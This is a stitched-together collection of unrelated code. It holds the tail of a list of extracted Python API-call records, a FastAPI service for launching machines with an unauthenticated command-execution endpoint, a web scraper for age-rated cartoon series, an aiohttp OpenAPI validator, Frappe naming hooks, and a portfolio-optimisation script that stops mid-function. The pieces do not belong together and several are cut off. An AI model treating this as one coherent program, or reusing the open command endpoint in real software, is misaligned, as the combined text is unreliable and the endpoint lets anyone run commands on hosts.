'import os\n'), ((245836, 245854), 'os.path.isfile', 'os.path.isfile', (['p1'], {}), '(p1)\n', (245850, 245854), False, 'import os\n'), ((252773, 252791), 'os.path.isfile', 'os.path.isfile', (['p1'], {}), '(p1)\n', (252787, 252791), False, 'import os\n'), ((252806, 252865), 'os.path.join', 'os.path.join', (['p', "cfg['subdir_ck_ext']", "cfg['file_meta_old']"], {}), "(p, cfg['subdir_ck_ext'], cfg['file_meta_old'])\n", (252818, 252865), False, 'import os\n'), ((254932, 254951), 'os.path.isfile', 'os.path.isfile', (['fn2'], {}), '(fn2)\n', (254946, 254951), False, 'import os\n'), ((255137, 255151), 'os.remove', 'os.remove', (['fn1'], {}), '(fn1)\n', (255146, 255151), False, 'import os\n'), ((255183, 255197), 'os.remove', 'os.remove', (['fn2'], {}), '(fn2)\n', (255192, 255197), False, 'import os\n'), ((255694, 255717), 'urllib2.Request', 'urllib2.Request', (['url', 's'], {}), '(url, s)\n', (255709, 255717), False, 'import urllib2\n'), ((262724, 262746), 're.match', 're.match', (['anames', 'func'], {}), '(anames, func)\n', (262732, 262746), False, 'import re\n'), ((270684, 270703), 'os.path.join', 'os.path.join', (['p', 'fn'], {}), '(p, fn)\n', (270696, 270703), False, 'import os\n'), ((270882, 270901), 'os.path.isfile', 'os.path.isfile', (['pfn'], {}), '(pfn)\n', (270896, 270901), False, 'import os\n'), ((271048, 271066), 'os.path.isfile', 'os.path.isfile', (['fn'], {}), '(fn)\n', (271062, 271066), False, 'import os\n'), ((271214, 271238), 'shutil.copyfile', 'shutil.copyfile', (['pfn', 'fn'], {}), '(pfn, fn)\n', (271229, 271238), False, 'import shutil\n'), ((272670, 272705), 'zipfile.ZipFile', 'zipfile.ZipFile', (['f', '"""w"""', 'zip_method'], {}), "(f, 'w', zip_method)\n", (272685, 272705), False, 'import zipfile\n'), ((273236, 273258), 'os.remove', 'os.remove', (['delete_file'], {}), '(delete_file)\n', (273245, 273258), False, 'import os\n'), ((275011, 275029), 'os.path.isfile', 'os.path.isfile', (['fn'], {}), '(fn)\n', (275025, 275029), False, 'import os\n'), ((275772, 275791), 'os.path.join', 'os.path.join', (['p', 'p1'], {}), '(p, p1)\n', (275784, 275791), False, 'import os\n'), ((278438, 278456), 'os.path.join', 'os.path.join', (['p', 'd'], {}), '(p, d)\n', (278450, 278456), False, 'import os\n'), ((294148, 294159), 'time.time', 'time.time', ([], {}), '()\n', (294157, 294159), False, 'import time\n'), ((16528, 16554), 'sys.stdout.buffer.write', 'sys.stdout.buffer.write', (['b'], {}), '(b)\n', (16551, 16554), False, 'import sys\n'), ((16568, 16598), 'sys.stdout.buffer.write', 'sys.stdout.buffer.write', (["b'\\n'"], {}), "(b'\\n')\n", (16591, 16598), False, 'import sys\n'), ((17983, 18009), 'sys.stderr.buffer.write', 'sys.stderr.buffer.write', (['b'], {}), '(b)\n', (18006, 18009), False, 'import sys\n'), ((18023, 18053), 'sys.stderr.buffer.write', 'sys.stderr.buffer.write', (["b'\\n'"], {}), "(b'\\n')\n", (18046, 18053), False, 'import sys\n'), ((24178, 24189), 'time.time', 'time.time', ([], {}), '()\n', (24187, 24189), False, 'import time\n'), ((54099, 54124), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (54114, 54124), False, 'import os\n'), ((54903, 54925), 'inspect.currentframe', 'inspect.currentframe', ([], {}), '()\n', (54923, 54925), False, 'import inspect\n'), ((56451, 56484), 'os.path.join', 'os.path.join', (['x', "cfg['repo_file']"], {}), "(x, cfg['repo_file'])\n", (56463, 56484), False, 'import os\n'), ((59344, 59395), 'os.environ.get', 'os.environ.get', (["cfg['env_key_local_kernel_uoa']", '""""""'], {}), "(cfg['env_key_local_kernel_uoa'], '')\n", (59358, 59395), False, 'import os\n'), ((61124, 61190), 'os.path.join', 'os.path.join', (["work['dir_default_repo']", "cfg['file_cache_repo_uoa']"], {}), "(work['dir_default_repo'], cfg['file_cache_repo_uoa'])\n", (61136, 61190), False, 'import os\n'), ((61290, 61357), 'os.path.join', 'os.path.join', (["work['dir_default_repo']", "cfg['file_cache_repo_info']"], {}), "(work['dir_default_repo'], cfg['file_cache_repo_info'])\n", (61302, 61357), False, 'import os\n'), ((71957, 71975), 'hashlib.md5', 'hashlib.md5', (['bpack'], {}), '(bpack)\n', (71968, 71975), False, 'import hashlib\n'), ((72406, 72435), 'os.path.join', 'os.path.join', (['new_path', 'new_d'], {}), '(new_path, new_d)\n', (72418, 72435), False, 'import os\n'), ((88511, 88531), 'os.path.join', 'os.path.join', (['p', 'sd1'], {}), '(p, sd1)\n', (88523, 88531), False, 'import os\n'), ((98316, 98350), 'urllib2.HTTPBasicAuthHandler', 'urllib2.HTTPBasicAuthHandler', (['auth'], {}), '(auth)\n', (98344, 98350), False, 'import urllib2\n'), ((98352, 98385), 'urllib2.HTTPSHandler', 'urllib2.HTTPSHandler', ([], {'context': 'ctx'}), '(context=ctx)\n', (98372, 98385), False, 'import urllib2\n'), ((119828, 119840), 'os.mkdir', 'os.mkdir', (['p1'], {}), '(p1)\n', (119836, 119840), False, 'import os\n'), ((122866, 122879), 'os.system', 'os.system', (['ss'], {}), '(ss)\n', (122875, 122879), False, 'import os\n'), ((122914, 122927), 'os.remove', 'os.remove', (['p1'], {}), '(p1)\n', (122923, 122927), False, 'import os\n'), ((126872, 126898), 'fnmatch.fnmatch', 'fnmatch.fnmatch', (['prefix', 'c'], {}), '(prefix, c)\n', (126887, 126898), False, 'import fnmatch\n'), ((133097, 133115), 'os.path.isfile', 'os.path.isfile', (['pl'], {}), '(pl)\n', (133111, 133115), False, 'import os\n'), ((135056, 135076), 'os.path.getmtime', 'os.path.getmtime', (['pl'], {}), '(pl)\n', (135072, 135076), False, 'import os\n'), ((135180, 135193), 'os.remove', 'os.remove', (['pl'], {}), '(pl)\n', (135189, 135193), False, 'import os\n'), ((174448, 174468), 're.match', 're.match', (['anames', 'ra'], {}), '(anames, ra)\n', (174456, 174468), False, 'import re\n'), ((174488, 174507), 're.match', 're.match', (['anames', 'm'], {}), '(anames, m)\n', (174496, 174507), False, 'import re\n'), ((174527, 174546), 're.match', 're.match', (['anames', 'd'], {}), '(anames, d)\n', (174535, 174546), False, 'import re\n'), ((174566, 174586), 're.match', 're.match', (['anames', 'di'], {}), '(anames, di)\n', (174574, 174586), False, 'import re\n'), ((178919, 178931), 'os.mkdir', 'os.mkdir', (['p3'], {}), '(p3)\n', (178927, 178931), False, 'import os\n'), ((193388, 193405), 'os.path.split', 'os.path.split', (['pm'], {}), '(pm)\n', (193401, 193405), False, 'import os\n'), ((194101, 194117), 'os.path.split', 'os.path.split', (['p'], {}), '(p)\n', (194114, 194117), False, 'import os\n'), ((194185, 194196), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (194194, 194196), False, 'import os\n'), ((194211, 194224), 'os.chdir', 'os.chdir', (['pp0'], {}), '(pp0)\n', (194219, 194224), False, 'import os\n'), ((194319, 194332), 'os.system', 'os.system', (['ss'], {}), '(ss)\n', (194328, 194332), False, 'import os\n'), ((194509, 194522), 'os.chdir', 'os.chdir', (['ppp'], {}), '(ppp)\n', (194517, 194522), False, 'import os\n'), ((198663, 198686), 're.match', 're.match', (['anames', 'nduoa'], {}), '(anames, nduoa)\n', (198671, 198686), False, 'import re\n'), ((198706, 198729), 're.match', 're.match', (['anames', 'nduid'], {}), '(anames, nduid)\n', (198714, 198729), False, 'import re\n'), ((199915, 199936), 'os.path.join', 'os.path.join', (['pm', 'sd1'], {}), '(pm, sd1)\n', (199927, 199936), False, 'import os\n'), ((200659, 200697), 'shutil.rmtree', 'shutil.rmtree', (['p'], {'onerror': 'rm_read_only'}), '(p, onerror=rm_read_only)\n', (200672, 200697), False, 'import shutil\n'), ((201498, 201510), 'os.mkdir', 'os.mkdir', (['p1'], {}), '(p1)\n', (201506, 201510), False, 'import os\n'), ((206205, 206228), 're.match', 're.match', (['anames', 'nduoa'], {}), '(anames, nduoa)\n', (206213, 206228), False, 'import re\n'), ((206248, 206271), 're.match', 're.match', (['anames', 'nduid'], {}), '(anames, nduid)\n', (206256, 206271), False, 'import re\n'), ((207611, 207630), 'os.path.isdir', 'os.path.isdir', (['pn1d'], {}), '(pn1d)\n', (207624, 207630), False, 'import os\n'), ((207632, 207649), 'os.makedirs', 'os.makedirs', (['pn1d'], {}), '(pn1d)\n', (207643, 207649), False, 'import os\n'), ((243259, 243270), 'time.time', 'time.time', ([], {}), '()\n', (243268, 243270), False, 'import time\n'), ((249695, 249716), 'fnmatch.fnmatch', 'fnmatch.fnmatch', (['q', 'k'], {}), '(q, k)\n', (249710, 249716), False, 'import fnmatch\n'), ((252881, 252899), 'os.path.isfile', 'os.path.isfile', (['p1'], {}), '(p1)\n', (252895, 252899), False, 'import os\n'), ((255837, 255856), 'urllib2.urlopen', 'urllib2.urlopen', (['rq'], {}), '(rq)\n', (255852, 255856), False, 'import urllib2\n'), ((257073, 257107), 'elasticsearch.Elasticsearch', 'elasticsearch.Elasticsearch', (['[url]'], {}), '([url])\n', (257100, 257107), False, 'import elasticsearch\n'), ((271717, 271762), 'tempfile.mkstemp', 'tempfile.mkstemp', ([], {'suffix': '""".tmp"""', 'prefix': '"""ck-"""'}), "(suffix='.tmp', prefix='ck-')\n", (271733, 271762), False, 'import tempfile\n'), ((271826, 271838), 'os.close', 'os.close', (['fd'], {}), '(fd)\n', (271834, 271838), False, 'import os\n'), ((271852, 271865), 'os.remove', 'os.remove', (['fn'], {}), '(fn)\n', (271861, 271865), False, 'import os\n'), ((278614, 278633), 'os.path.dirname', 'os.path.dirname', (['pp'], {}), '(pp)\n', (278629, 278633), False, 'import os\n'), ((294574, 294585), 'time.time', 'time.time', ([], {}), '()\n', (294583, 294585), False, 'import time\n'), ((18101, 18120), 'sys.stderr.write', 'sys.stderr.write', (['s'], {}), '(s)\n', (18117, 18120), False, 'import sys\n'), ((37781, 37798), 'platform.system', 'platform.system', ([], {}), '()\n', (37796, 37798), False, 'import platform\n'), ((38013, 38047), 'os.environ.get', 'os.environ.get', (['"""ProgramW6432"""', '""""""'], {}), "('ProgramW6432', '')\n", (38027, 38047), False, 'import os\n'), ((38054, 38093), 'os.environ.get', 'os.environ.get', (['"""ProgramFiles(x86)"""', '""""""'], {}), "('ProgramFiles(x86)', '')\n", (38068, 38093), False, 'import os\n'), ((58831, 58864), 'os.path.join', 'os.path.join', (['s', "cfg['repo_file']"], {}), "(s, cfg['repo_file'])\n", (58843, 58864), False, 'import os\n'), ((64947, 64963), 'os.path.isdir', 'os.path.isdir', (['p'], {}), '(p)\n', (64960, 64963), False, 'import os\n'), ((72591, 72614), 'os.path.dirname', 'os.path.dirname', (['new_pp'], {}), '(new_pp)\n', (72606, 72614), False, 'import os\n'), ((98458, 98492), 'urllib2.HTTPBasicAuthHandler', 'urllib2.HTTPBasicAuthHandler', (['auth'], {}), '(auth)\n', (98486, 98492), False, 'import urllib2\n'), ((123915, 123933), 'os.path.isfile', 'os.path.isfile', (['p1'], {}), '(p1)\n', (123929, 123933), False, 'import os\n'), ((132655, 132666), 'time.time', 'time.time', ([], {}), '()\n', (132664, 132666), False, 'import time\n'), ((133117, 133130), 'os.remove', 'os.remove', (['pl'], {}), '(pl)\n', (133126, 133130), False, 'import os\n'), ((165564, 165583), 'os.path.join', 'os.path.join', (['p', 'ff'], {}), '(p, ff)\n', (165576, 165583), False, 'import os\n'), ((181623, 181643), 'os.path.join', 'os.path.join', (['p2', 'ff'], {}), '(p2, ff)\n', (181635, 181643), False, 'import os\n'), ((199957, 199975), 'os.path.isdir', 'os.path.isdir', (['pm1'], {}), '(pm1)\n', (199970, 199975), False, 'import os\n'), ((199993, 200006), 'os.mkdir', 'os.mkdir', (['pm1'], {}), '(pm1)\n', (200001, 200006), False, 'import os\n'), ((221969, 221982), 'os.listdir', 'os.listdir', (['p'], {}), '(p)\n', (221979, 221982), False, 'import os\n'), ((251522, 251544), 'fnmatch.fnmatch', 'fnmatch.fnmatch', (['v', 'ss'], {}), '(v, ss)\n', (251537, 251544), False, 'import fnmatch\n'), ((271459, 271470), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (271468, 271470), False, 'import os\n'), ((271508, 271519), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (271517, 271519), False, 'import os\n'), ((272806, 272825), 'os.path.join', 'os.path.join', (['p', 'fn'], {}), '(p, fn)\n', (272818, 272825), False, 'import os\n'), ((278543, 278561), 'os.path.exists', 'os.path.exists', (['pp'], {}), '(pp)\n', (278557, 278561), False, 'import os\n'), ((278563, 278578), 'os.makedirs', 'os.makedirs', (['pp'], {}), '(pp)\n', (278574, 278578), False, 'import os\n'), ((278655, 278674), 'os.path.exists', 'os.path.exists', (['ppd'], {}), '(ppd)\n', (278669, 278674), False, 'import os\n'), ((278676, 278692), 'os.makedirs', 'os.makedirs', (['ppd'], {}), '(ppd)\n', (278687, 278692), False, 'import os\n'), ((278740, 278758), 'os.path.isfile', 'os.path.isfile', (['pp'], {}), '(pp)\n', (278754, 278758), False, 'import os\n'), ((72500, 72522), 'os.path.exists', 'os.path.exists', (['new_pp'], {}), '(new_pp)\n', (72514, 72522), False, 'import os\n'), ((72524, 72543), 'os.makedirs', 'os.makedirs', (['new_pp'], {}), '(new_pp)\n', (72535, 72543), False, 'import os\n'), ((72640, 72663), 'os.path.exists', 'os.path.exists', (['new_ppd'], {}), '(new_ppd)\n', (72654, 72663), False, 'import os\n'), ((72665, 72685), 'os.makedirs', 'os.makedirs', (['new_ppd'], {}), '(new_ppd)\n', (72676, 72685), False, 'import os\n'), ((74246, 74265), 'os.path.normpath', 'os.path.normpath', (['p'], {}), '(p)\n', (74262, 74265), False, 'import os\n'), ((98564, 98597), 'urllib2.HTTPSHandler', 'urllib2.HTTPSHandler', ([], {'context': 'ctx'}), '(context=ctx)\n', (98584, 98597), False, 'import urllib2\n'), ((123881, 123894), 'os.system', 'os.system', (['ss'], {}), '(ss)\n', (123890, 123894), False, 'import os\n'), ((123955, 123968), 'os.remove', 'os.remove', (['p1'], {}), '(p1)\n', (123964, 123968), False, 'import os\n'), ((132630, 132650), 'os.path.getmtime', 'os.path.getmtime', (['pl'], {}), '(pl)\n', (132646, 132650), False, 'import os\n'), ((132724, 132742), 'os.path.isfile', 'os.path.isfile', (['pl'], {}), '(pl)\n', (132738, 132742), False, 'import os\n'), ((132800, 132818), 'time.sleep', 'time.sleep', (['retryd'], {}), '(retryd)\n', (132810, 132818), False, 'import time\n'), ((132841, 132859), 'os.path.isfile', 'os.path.isfile', (['pl'], {}), '(pl)\n', (132855, 132859), False, 'import os\n'), ((132966, 132984), 'os.path.isfile', 'os.path.isfile', (['pl'], {}), '(pl)\n', (132980, 132984), False, 'import os\n'), ((169943, 169960), 'platform.system', 'platform.system', ([], {}), '()\n', (169958, 169960), False, 'import platform\n'), ((25401, 25418), 'platform.system', 'platform.system', ([], {}), '()\n', (25416, 25418), False, 'import platform\n'), ((65744, 65764), 'os.path.join', 'os.path.join', (['pe', 'fn'], {}), '(pe, fn)\n', (65756, 65764), False, 'import os\n'), ((65792, 65809), 'os.path.isfile', 'os.path.isfile', (['p'], {}), '(p)\n', (65806, 65809), False, 'import os\n'), ((221604, 221629), 'fnmatch.fnmatch', 'fnmatch.fnmatch', (['ruoa', 'wr'], {}), '(ruoa, wr)\n', (221619, 221629), False, 'import fnmatch\n'), ((225125, 225163), 'os.path.join', 'os.path.join', (['dp', "cfg['subdir_ck_ext']"], {}), "(dp, cfg['subdir_ck_ext'])\n", (225137, 225163), False, 'import os\n'), ((225194, 225250), 'os.path.join', 'os.path.join', (['dp', "cfg['subdir_ck_ext']", "cfg['file_info']"], {}), "(dp, cfg['subdir_ck_ext'], cfg['file_info'])\n", (225206, 225250), False, 'import os\n'), ((225280, 225336), 'os.path.join', 'os.path.join', (['dp', "cfg['subdir_ck_ext']", "cfg['file_meta']"], {}), "(dp, cfg['subdir_ck_ext'], cfg['file_meta'])\n", (225292, 225336), False, 'import os\n'), ((225451, 225471), 'os.path.isdir', 'os.path.isdir', (['dpcfg'], {}), '(dpcfg)\n', (225464, 225471), False, 'import os\n'), ((65000, 65019), 'os.path.realpath', 'os.path.realpath', (['p'], {}), '(p)\n', (65016, 65019), False, 'import os\n'), ((65623, 65651), 'fnmatch.fnmatch', 'fnmatch.fnmatch', (['fn', 'pattern'], {}), '(fn, pattern)\n', (65638, 65651), False, 'import fnmatch\n'), ((132912, 132923), 'time.time', 'time.time', ([], {}), '()\n', (132921, 132923), False, 'import time\n'), ((222126, 222145), 'os.path.join', 'os.path.join', (['p', 'fn'], {}), '(p, fn)\n', (222138, 222145), False, 'import os\n'), ((223753, 223767), 'os.listdir', 'os.listdir', (['mp'], {}), '(mp)\n', (223763, 223767), False, 'import os\n'), ((65099, 65119), 'os.path.join', 'os.path.join', (['pe', 'fn'], {}), '(pe, fn)\n', (65111, 65119), False, 'import os\n'), ((132887, 132907), 'os.path.getmtime', 'os.path.getmtime', (['pl'], {}), '(pl)\n', (132903, 132907), False, 'import os\n'), ((52640, 52655), 'os.remove', 'os.remove', (['name'], {}), '(name)\n', (52649, 52655), False, 'import os\n'), ((65852, 65862), 'os.stat', 'os.stat', (['p'], {}), '(p)\n', (65859, 65862), False, 'import os\n'), ((223090, 223115), 'fnmatch.fnmatch', 'fnmatch.fnmatch', (['muoa', 'wm'], {}), '(muoa, wm)\n', (223105, 223115), False, 'import fnmatch\n'), ((226526, 226548), 'os.path.isfile', 'os.path.isfile', (['dpinfo'], {}), '(dpinfo)\n', (226540, 226548), False, 'import os\n'), ((226973, 226995), 'os.path.isfile', 'os.path.isfile', (['dpmeta'], {}), '(dpmeta)\n', (226987, 226995), False, 'import os\n'), ((230768, 230779), 'time.time', 'time.time', ([], {}), '()\n', (230777, 230779), False, 'import time\n'), ((223961, 223981), 'os.path.join', 'os.path.join', (['mp', 'fn'], {}), '(mp, fn)\n', (223973, 223981), False, 'import os\n'), ((224115, 224135), 'os.path.join', 'os.path.join', (['mp', 'fn'], {}), '(mp, fn)\n', (224127, 224135), False, 'import os\n'), ((224219, 224234), 'os.listdir', 'os.listdir', (['mp2'], {}), '(mp2)\n', (224229, 224234), False, 'import os\n'), ((225975, 226001), 'fnmatch.fnmatch', 'fnmatch.fnmatch', (['tduoa', 'wd'], {}), '(tduoa, wd)\n', (225990, 226001), False, 'import fnmatch\n'), ((224447, 224468), 'os.path.join', 'os.path.join', (['mp2', 'fn'], {}), '(mp2, fn)\n', (224459, 224468), False, 'import os\n')]
|
import asyncio
import datetime
import json
import random
import string
#import aiofiles
from fastapi import FastAPI
from fastapi.responses import HTMLResponse, FileResponse, StreamingResponse, Response, Response
from fastapi.staticfiles import StaticFiles
from fastapi import FastAPI, File, UploadFile
from pydantic import BaseModel
import items
# fastapi
app = FastAPI()
#app.mount("/html", StaticFiles(directory="html"), name="root")
@app.get("/get_all_machine")
async def request_all_machine_name():
return items.get_all_machine_name()
@app.get("/launch_machine")
async def request_launch_machine(
hostname: str,
imagealias="",
imagefinger="",
machinetype="container",
cpu=2,
memory="2GB",
storage="32GB",
srcport=8080,
startcheck=1,
https=0,
httpstatus=200,
starttimeout=60,
startportassign=10000
):
result = await items.launch_machine(
hostname,
imagealias,
imagefinger,
machinetype,
cpu,
memory,
storage,
srcport,
startcheck,
https,
httpstatus,
starttimeout,
startportassign
)
return result
@app.get("/start")
async def request_start_machine(hostname: str):
return items.start_machine(hostname)
@app.get("/stop")
async def request_stop_machine(hostname: str):
return items.stop_machine(hostname)
@app.get("/exec_command")
async def request_exec_command_machine(hostname: str, command: str):
return await items.exec_command_to_machine(hostname, command)
@app.post("/uploadfile/{hostname}")
async def create_upload_file(hostname: str, file: UploadFile = File(...)):
filedata = await file.read()
return await items.send_file_to_machine(hostname, file.filename, filedata)
|
[
"items.get_all_machine_name",
"items.launch_machine",
"items.send_file_to_machine",
"items.exec_command_to_machine",
"items.stop_machine",
"fastapi.File",
"items.start_machine",
"fastapi.FastAPI"
] |
[((366, 375), 'fastapi.FastAPI', 'FastAPI', ([], {}), '()\n', (373, 375), False, 'from fastapi import FastAPI, File, UploadFile\n'), ((521, 549), 'items.get_all_machine_name', 'items.get_all_machine_name', ([], {}), '()\n', (547, 549), False, 'import items\n'), ((1259, 1288), 'items.start_machine', 'items.start_machine', (['hostname'], {}), '(hostname)\n', (1278, 1288), False, 'import items\n'), ((1367, 1395), 'items.stop_machine', 'items.stop_machine', (['hostname'], {}), '(hostname)\n', (1385, 1395), False, 'import items\n'), ((1660, 1669), 'fastapi.File', 'File', (['...'], {}), '(...)\n', (1664, 1669), False, 'from fastapi import FastAPI, File, UploadFile\n'), ((889, 1058), 'items.launch_machine', 'items.launch_machine', (['hostname', 'imagealias', 'imagefinger', 'machinetype', 'cpu', 'memory', 'storage', 'srcport', 'startcheck', 'https', 'httpstatus', 'starttimeout', 'startportassign'], {}), '(hostname, imagealias, imagefinger, machinetype, cpu,\n memory, storage, srcport, startcheck, https, httpstatus, starttimeout,\n startportassign)\n', (909, 1058), False, 'import items\n'), ((1510, 1558), 'items.exec_command_to_machine', 'items.exec_command_to_machine', (['hostname', 'command'], {}), '(hostname, command)\n', (1539, 1558), False, 'import items\n'), ((1722, 1783), 'items.send_file_to_machine', 'items.send_file_to_machine', (['hostname', 'file.filename', 'filedata'], {}), '(hostname, file.filename, filedata)\n', (1748, 1783), False, 'import items\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
# Поиск мультсериалов 16+
# Пример сериала: 'http://onlinemultfilmy.ru/bratya-ventura/'
import time
from grab import Grab
g = Grab()
# Перебор страниц с мультами
for i in range(1, 82 + 1):
url_page = 'http://onlinemultfilmy.ru/multserialy/page/' + str(i)
print(url_page)
# Загрузка страницы с мультами
g.go(url_page)
# Перебор и загрузка мультов на странице
for url in g.doc.select('//div[@class="cat-post"]/a'):
g.go(url.attr('href'))
if g.doc.select('//*[@class="age_icon age_icon_16"]').count():
print(' ', url.attr('title'), url.attr('href'))
# Чтобы сервер не посчитал это дос атакой
time.sleep(2)
|
[
"grab.Grab",
"time.sleep"
] |
[((202, 208), 'grab.Grab', 'Grab', ([], {}), '()\n', (206, 208), False, 'from grab import Grab\n'), ((741, 754), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (751, 754), False, 'import time\n')]
|
from aiohttp import web
from openapi_core.validation.request.validators import RequestValidator
from openapi_core.validation.response.validators import ResponseValidator
from .openapi_wrappers import (
PATH_KEY,
QUERY_KEY,
AiohttpOpenAPIRequest,
AiohttpOpenAPIResponse,
)
from .rest_oas import OpenApiSpec, get_specs
from .rest_responses import create_error_response
class OpenApiValidator:
"""
Used to validate data in the request->response cycle against openapi specs
"""
@classmethod
def create(cls, app: web.Application, _version=""):
specs = get_specs(app)
# TODO: one per version!
return cls(specs)
def __init__(self, spec: OpenApiSpec):
self._reqvtor = RequestValidator(spec, custom_formatters=None)
self._resvtor = ResponseValidator(spec, custom_formatters=None)
# Current
self.current_request = None # wrapper request
async def check_request(self, request: web.Request):
self.current_request = None
rq = await AiohttpOpenAPIRequest.create(request)
result = self._reqvtor.validate(rq)
# keeps current request and reuses in response
self.current_request = rq
if result.errors:
err = create_error_response(
result.errors,
"Failed request validation against API specs",
web.HTTPBadRequest,
)
raise err
path, query = [result.parameters[k] for k in (PATH_KEY, QUERY_KEY)]
return path, query, result.body
def check_response(self, response: web.Response):
req = self.current_request
res = AiohttpOpenAPIResponse(
response, response.text
) # FIXME:ONLY IN SERVER side. Async in client!
result = self._resvtor.validate(req, res)
if result.errors:
err = create_error_response(
result.errors,
"Failed response validation against API specs",
web.HTTPServiceUnavailable,
)
raise err
|
[
"openapi_core.validation.response.validators.ResponseValidator",
"openapi_core.validation.request.validators.RequestValidator"
] |
[((741, 787), 'openapi_core.validation.request.validators.RequestValidator', 'RequestValidator', (['spec'], {'custom_formatters': 'None'}), '(spec, custom_formatters=None)\n', (757, 787), False, 'from openapi_core.validation.request.validators import RequestValidator\n'), ((812, 859), 'openapi_core.validation.response.validators.ResponseValidator', 'ResponseValidator', (['spec'], {'custom_formatters': 'None'}), '(spec, custom_formatters=None)\n', (829, 859), False, 'from openapi_core.validation.response.validators import ResponseValidator\n')]
|
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.model.naming import make_autoname
import datetime
settings = frappe.get_doc("CRM Settings")
global_settings = frappe.get_doc("Global Defaults")
def set_image(self, method):
self.sign = settings.signature
self._address = settings.address
def set_address(self,method):
self._address = settings.address
self.dododododo = global_settings.current_fiscal_year
def get_user_permission(user):
pass
@frappe.whitelist()
def set_terriotory(customer):
terr_ = frappe.db.get_value("Customer",{"name":customer},["territory"])
return terr_
def autoname(doc,method):
series = doc.naming_series
fis_year = frappe.defaults.get_user_default("fiscal_year")
fis_year = fis_year.split("-")
doc.name = make_autoname("IT" + "/" + fis_year[0]+ "-"+fis_year[1][-2:] + "/" + series + ".####")
|
[
"frappe.whitelist",
"frappe.db.get_value",
"frappe.defaults.get_user_default",
"frappe.get_doc",
"frappe.model.naming.make_autoname"
] |
[((149, 179), 'frappe.get_doc', 'frappe.get_doc', (['"""CRM Settings"""'], {}), "('CRM Settings')\n", (163, 179), False, 'import frappe\n'), ((198, 231), 'frappe.get_doc', 'frappe.get_doc', (['"""Global Defaults"""'], {}), "('Global Defaults')\n", (212, 231), False, 'import frappe\n'), ((491, 509), 'frappe.whitelist', 'frappe.whitelist', ([], {}), '()\n', (507, 509), False, 'import frappe\n'), ((549, 615), 'frappe.db.get_value', 'frappe.db.get_value', (['"""Customer"""', "{'name': customer}", "['territory']"], {}), "('Customer', {'name': customer}, ['territory'])\n", (568, 615), False, 'import frappe\n'), ((694, 741), 'frappe.defaults.get_user_default', 'frappe.defaults.get_user_default', (['"""fiscal_year"""'], {}), "('fiscal_year')\n", (726, 741), False, 'import frappe\n'), ((786, 879), 'frappe.model.naming.make_autoname', 'make_autoname', (["('IT' + '/' + fis_year[0] + '-' + fis_year[1][-2:] + '/' + series + '.####')"], {}), "('IT' + '/' + fis_year[0] + '-' + fis_year[1][-2:] + '/' +\n series + '.####')\n", (799, 879), False, 'from frappe.model.naming import make_autoname\n')]
|
import warnings
warnings.filterwarnings("ignore")
import yfinance as yf
import numpy as np
import pandas as pd
import matplotlib
import matplotlib as mpl
matplotlib.use("Agg")
from matplotlib import style
from matplotlib import pyplot as plt
plt.style.use("ggplot")
import seaborn as sns
plt.style.use("seaborn")
sns.set_palette("cubehelix")
plt.rcParams["figure.figsize"] = [18, 10]
plt.rcParams["figure.dpi"] = 150
sm, med, lg = 10, 15, 20
plt.rc("font", size=sm) # controls default text sizes
plt.rc("axes", titlesize=med) # fontsize of the axes title
plt.rc("axes", labelsize=med) # fontsize of the x & y labels
plt.rc("xtick", labelsize=sm) # fontsize of the tick labels
plt.rc("ytick", labelsize=sm) # fontsize of the tick labels
plt.rc("legend", fontsize=sm) # legend fontsize
plt.rc("figure", titlesize=lg) # fontsize of the figure title
plt.rc("axes", linewidth=2) # linewidth of plot lines
import streamlit as st
from pathlib import Path
path = str(Path.cwd()) + "/"
from datetime import datetime
today = str(datetime.now())[:10]
# * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
# * * * * * * * * * * * * * * * * * * * * *
# * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
class The_Efficient_Frontier(object):
def __init__(self, RISKY_ASSETS):
self.RISKY_ASSETS = RISKY_ASSETS
self.prices_df = yf.download(self.RISKY_ASSETS, start="2020-01-01")["Adj Close"]
self.N_PORTFOLIOS = 10 ** 5
self.N_DAYS = 252
self.n_assets = len(self.RISKY_ASSETS)
self.string = ""
for r in self.RISKY_ASSETS:
self.string += r + "_"
def ef_setup(self):
self.returns_df = self.prices_df.pct_change().dropna()
self.avg_returns = self.returns_df.mean() * self.N_DAYS
self.cov_mat = self.returns_df.cov() * self.N_DAYS
# simulate random portfolio weights:
np.random.seed(42)
self.weights = np.random.random(size=(self.N_PORTFOLIOS, self.n_assets))
self.weights /= np.sum(self.weights, axis=1)[:, np.newaxis]
# calculate portfolio metrics:
self.portf_rtns = np.dot(self.weights, self.avg_returns)
self.portf_vol = []
for i in range(0, len(self.weights)):
self.portf_vol.append(
np.sqrt(
np.dot(self.weights[i].T, np.dot(self.cov_mat, self.weights[i]))
)
)
self.portf_vol = np.array(self.portf_vol)
self.portf_sharpe_ratio = self.portf_rtns / self.portf_vol
# create joint dataframe with all data:
self.portf_results_df = pd.DataFrame(
{
"returns": self.portf_rtns,
"volatility": self.portf_vol,
"sharpe_ratio": self.portf_sharpe_ratio,
}
)
# locate points creating efficient frontier:
self.N_POINTS = 100
self.portf_vol_ef = []
self.indices_to_skip = []
self.portf_rtns_ef = np.linspace(
self.portf_results_df.returns.min(),
self.portf_results_df.returns.max(),
self.N_POINTS,
)
self.portf_rtns_ef = np.round(self.portf_rtns_ef, 2)
self.portf_rtns = np.round(self.portf_rtns, 2)
for point_index in range(self.N_POINTS):
if self.portf_rtns_ef[point_index] not in self.portf_rtns:
self.indices_to_skip.append(point_index)
continue
self.matched_ind = np.where(
self.portf_rtns == self.portf_rtns_ef[point_index]
)
self.portf_vol_ef.append(np.min(self.portf_vol[self.matched_ind]))
self.portf_rtns_ef = np.delete(self.portf_rtns_ef, self.indices_to_skip)
def results_maxSharpeRatio(self):
self.ef_setup()
self.max_sharpe_ind = np.argmax(self.portf_results_df.sharpe_ratio)
self.max_sharpe_portf = self.portf_results_df.loc[self.max_sharpe_ind]
self.min_vol_ind = np.argmin(self.portf_results_df.volatility)
